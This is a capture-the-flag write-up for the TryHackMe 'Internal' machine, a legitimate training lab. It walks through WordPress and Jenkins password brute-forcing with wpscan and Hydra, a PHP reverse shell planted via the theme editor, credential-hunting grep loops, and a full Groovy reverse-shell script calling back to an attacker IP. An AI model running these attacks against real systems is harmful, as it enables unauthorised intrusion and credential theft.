Internal - Pentesting Challenge @THM
Overview
Reconnaissance
1# nmap -A -T4 -oN internal-pentesting.nmap.txt 10.10.188.67
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 20:29 EST
3Nmap scan report for 10.10.188.67
4Host is up (0.080s latency).
5Not shown: 998 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
10| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
11|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
1280/tcp open http Apache httpd 2.4.29 ((Ubuntu))
13|_http-server-header: Apache/2.4.29 (Ubuntu)
14|_http-title: Apache2 Ubuntu Default Page: It works
15No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
16TCP/IP fingerprint:
17OS:SCAN(V=7.91%E=4%D=11/25%OT=22%CT=1%CU=42806%PV=Y%DS=4%DC=T%G=Y%TM=5FBF05
18OS:23%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OP
19OS:S(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST
20OS:11NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
21OS:N(R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
22OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
23OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
24OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
25OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
26OS:D=S)
27
28Network Distance: 4 hops
29Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
30
31TRACEROUTE (using port 110/tcp)
32HOP RTT ADDRESS
331 10.72 ms 10.6.0.1
342 ... 3
354 83.68 ms 10.10.188.67
36
37OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
38Nmap done: 1 IP address (1 host up) scanned in 26.05 seconds
39
Port 22 and 80 are open.
Also, NMAP scan suggests that there is a apache webserver running with likely version 2.4.29. The browser shows the default webserver page.
We can fire up dirb/gobuster to enumerate a little deeper and see if we can find any directories.
Enumeration
I ran the directory scan and found several directories including wordpress and phpmyadmin which look very interesting.
1# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.188.67 -t100
2===============================================================
3Gobuster v3.0.1
4by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5===============================================================
6[+] Url: http://10.10.188.67
7[+] Threads: 100
8[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
9[+] Status codes: 200,204,301,302,307,401,403
10[+] User Agent: gobuster/3.0.1
11[+] Timeout: 10s
12===============================================================
132020/11/25 20:43:02 Starting gobuster
14===============================================================
15/wordpress (Status: 301)
16/javascript (Status: 301)
17/blog (Status: 301)
18/phpmyadmin (Status: 301)
19/server-status (Status: 403)
20===============================================================
212020/11/25 20:46:10 Finished
22===============================================================
23
I tried the phpmyadmin with default creds but it did not help.
1$ sudo wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt --max-threads 100
2[sudo] password for eneloop:
3_______________________________________________________________
4 __ _______ _____
5 \ \ / / __ \ / ____|
6 \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
7 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
8 \ /\ / | | ____) | (__| (_| | | | |
9 \/ \/ |_| |_____/ \___|\__,_|_| |_|
10
11 WordPress Security Scanner by the WPScan Team
12 Version 3.8.10
13 Sponsored by Automattic - https://automattic.com/
14 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
15_______________________________________________________________
16
17[+] URL: http://internal.thm/blog/ [10.10.188.67]
18[+] Started: Wed Nov 25 21:44:22 2020
19
20Interesting Finding(s):
21
22[+] Headers
23 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
24 | Found By: Headers (Passive Detection)
25 | Confidence: 100%
26
27[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
28 | Found By: Direct Access (Aggressive Detection)
29 | Confidence: 100%
30 | References:
31 | - http://codex.wordpress.org/XML-RPC_Pingback_API
32 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
33 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
34 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
35 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
36
37[+] WordPress readme found: http://internal.thm/blog/readme.html
38 | Found By: Direct Access (Aggressive Detection)
39 | Confidence: 100%
40
41[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
42 | Found By: Direct Access (Aggressive Detection)
43 | Confidence: 60%
44 | References:
45 | - https://www.iplocation.net/defend-wordpress-from-ddos
46 | - https://github.com/wpscanteam/wpscan/issues/1299
47
48[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
49 | Found By: Rss Generator (Passive Detection)
50 | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
51 | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
52
53[+] WordPress theme in use: twentyseventeen
54 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
55 | Last Updated: 2020-08-11T00:00:00.000Z
56 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
57 | [!] The version is out of date, the latest version is 2.4
58 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
59 | Style Name: Twenty Seventeen
60 | Style URI: https://wordpress.org/themes/twentyseventeen/
61 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
62 | Author: the WordPress team
63 | Author URI: https://wordpress.org/
64 |
65 | Found By: Css Style In Homepage (Passive Detection)
66 |
67 | Version: 2.3 (80% confidence)
68 | Found By: Style (Passive Detection)
69 | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
70
71[+] Enumerating All Plugins (via Passive Methods)
72
73[i] No plugins Found.
74
75[+] Enumerating Config Backups (via Passive and Aggressive Methods)
76 Checking Config Backups - Time: 00:00:01 <=================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01
77
78[i] No Config Backups Found.
79
80[+] Performing password attack on Xmlrpc against 1 user/s
81[SUCCESS] - admin / my2boys
82Trying admin / nguyen Time: 00:00:59 < > (3900 / 14348292) 0.02% ETA: ??:??:??
83
84[!] Valid Combinations Found:
85 | Username: admin, Password: XXXXXXX
86
87[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
88[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
89
90[+] Finished: Wed Nov 25 21:45:31 2020
91[+] Requests Done: 3952
92[+] Cached Requests: 5
93[+] Data Sent: 1.924 MB
94[+] Data Received: 2.588 MB
95[+] Memory used: 238.996 MB
96[+] Elapsed time: 00:01:08
97
Exploitation
With that. we can now login to wordpress using the admin account. If you are familiar with wordpress, the admin panel allows you to edit theme files online and thats a commonly exploited functionality. I wonder why wordpress would support that.
Using the theme editor, edit the 404.php since this is harmless and extremely unlikely to break the site functionality. Replace the contents of this file with the reverse shell script and save. Now go to the home page and click on the blog post and alter the URL by adding few more characters to the path and when we hit enter, it will try to take the browser to a nonexistent page thus triggering the 404 which will run our reverse shell script.
Now, start a listener on the attack machine on the port defined in the reverse shell and hit enter on the browser to trigger 404.
1~# nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.66.198] 37996
4Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
5 17:34:32 up 21 min, 0 users, load average: 0.00, 0.00, 0.01
6USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
7uid=33(www-data) gid=33(www-data) groups=33(www-data)
8/bin/sh: 0: can't access tty; job control turned off
We have the shell now.
Lets upload LinEnum.sh so we can enumerate more on the host and try to find ways to escalate our privileges.
Important findings from LinEnum -
1
2[-] Users that have previously logged onto the system:
3Username Port From Latest
4root pts/0 10.6.2.56 Mon Aug 3 19:59:17 +0000 2020
5aubreanna pts/1 10.6.2.56 Mon Aug 3 19:56:19 +0000 2020
6
7[-] /etc/init/ config file permissions:
8total 16
9drwxr-xr-x 2 root root 4096 Aug 3 03:01 .
10drwxr-xr-x 102 root root 4096 Aug 3 18:41 ..
11-rw-r--r-- 1 root root 1757 Jan 12 2018 mysql.conf
12-rw-r--r-- 1 root root 239 Oct 28 2016 ubuntu-fan.conf
13
14### SOFTWARE #############################################
15[-] Sudo version:
16Sudo version 1.8.21p2
17
18
19[-] MYSQL version:
20mysql Ver 14.14 Distrib 5.7.31, for Linux (x86_64) using EditLine wrapper
21
22
23[-] Apache version:
24Server version: Apache/2.4.29 (Ubuntu)
25Server built: 2020-03-13T12:26:16
26
27
28[+] Looks like we're hosting Docker:
29Docker version 19.03.6, build 369ce74a3c
30
linenum and linpeas took us nowhere and I spent good 30-40 minutes banging my head against the wall. Then ran a deep scan with my little script here to look for any saved credentials that I could use and then hit the jackpot.
1# wirem0nster
2for fs in home etc opt
3do
4grep -wirE 'password|credential|passwords|credentials' /$fs/* 2>/dev/null;
5done;
You will find credentials for the user stored in a text file here -
1$ cat /opt/wp-save.txt
2Bill,
3
4Aubreanna needed these credentials for something later. Let her know you have them and where they are.
5
6aubreanna:XXXXXXXXXX
7$
Now, we can login using ssh and access the home directory which has two text files user.txt (Has the user flag) and jenkins.txt (indicating that jenkins service is running locally).
1aubreanna@internal:~$ cat jenkins.txt
2Internal Jenkins service is running on 172.17.0.2:8080
3aubreanna@internal:~$ netstat -lnt
4Active Internet connections (only servers)
5Proto Recv-Q Send-Q Local Address Foreign Address State
6tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN
7tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
8tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
9tcp 0 0 127.0.0.1:44865 0.0.0.0:* LISTEN
10tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
11tcp6 0 0 :::80 :::* LISTEN
12tcp6 0 0 :::22 :::* LISTEN
13aubreanna@internal:~$
Since the service is bound to 127.0.0.1, we cannot access this remotely. Lets do a SSH port forward so we can try to access the jenkins login page.
1$ ssh -NL 127.0.0.1:8080:localhost:8080 [email protected]
2[email protected]'s password:
3
You should now see a jenkin’s login page and we should be able to brute force our way into the system. Fire up the burp suit and record the POST request of the login page. We can send this to intruder and try the bruteforce attack however it runs extremely slow and I prefer to use Hydra instead.
Fun Fact - I was stuck here for an hour with trying to use Hydra to crack the password. Finally reached out to THM discord and guess what! I was able to find @THM’s Official Mayor and @N3PP13 and chat with them for hints. Apparently I was told that I was on the right path but needed to reexamine the request I was sending. I had a very silly typo and I was able to figure that out myself.
Anyway, here is what works -
1# hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 localhost http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&Submit=Sign+in:F=Invalid" -V
2Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
3
4Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-26 16:55:31
5[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
6[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
7[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&Submit=Sign+in:F=Invalid
8..
9..
10[ATTEMPT] target localhost - login "admin" - pass "patrick" - 112 of 14344399 [child 14] (0/0)
11[ATTEMPT] target localhost - login "admin" - pass "iloveme" - 113 of 14344399 [child 15] (0/0)
12[ATTEMPT] target localhost - login "admin" - pass "sakura" - 114 of 14344399 [child 6] (0/0)
13[ATTEMPT] target localhost - login "admin" - pass "adrian" - 115 of 14344399 [child 9] (0/0)
14[8080][http-post-form] host: localhost login: admin password: spongebob
151 of 1 target successfully completed, 1 valid password found
16Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-26 16:55:59
Post-Exploitation/Privilege Escalation
Login to Jenkins admin console using this password and go to “manage jenkins” –> “script console” and then here we can enter arbitrary Groovy script based on the message on the page.
Look up on Google for the reverse shell script and I came across this one -
source: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
1String host="10.6.19.215";
2int port=4444;
3String cmd="/bin/bash";
4Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Start a listener on the attack machine on port 4444 and now, you should be inside the Jenkins container over the reverse shell.
1for fs in home etc opt
2do
3grep -wirE 'password|credential|passwords|credentials' /$fs/* /dev/null;
4done;
5
6..
7..
8/etc/subversion/config:# password-stores =
9/etc/subversion/config:### Both 'store-passwords' and 'store-auth-creds' can now be
10/etc/subversion/config:# store-passwords = no
11/opt/note.txt:Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
12
Here you will notive a note.txt that stands out and contains the keywords we are looking for. Here we should find the root password for the machine.
1cat /opt/note.txt
2Aubreanna,
3
4Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
5need access to the root user account.
6
7root:XXXXXXXXXXX
8
Now, if you remember from the LinPeas and linenum outputs from before, the SSH service allowed remote root login which means we can remotely ssh into the machine.
1:~$ ssh [email protected]
2[email protected]'s password:
3Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
4
5 * Documentation: https://help.ubuntu.com
6 * Management: https://landscape.canonical.com
7
8
9..
10..
11
12
13root@internal:~#
14root@internal:~# cat root.txt
15THM{XXXXXXXXXXXXXXXXXX}
16root@internal:~#
17
Some additional Notes:
- Don’t give up easily, take a break if you are stuck and come back again with fresh mind.
- Ask for help on discord or other forums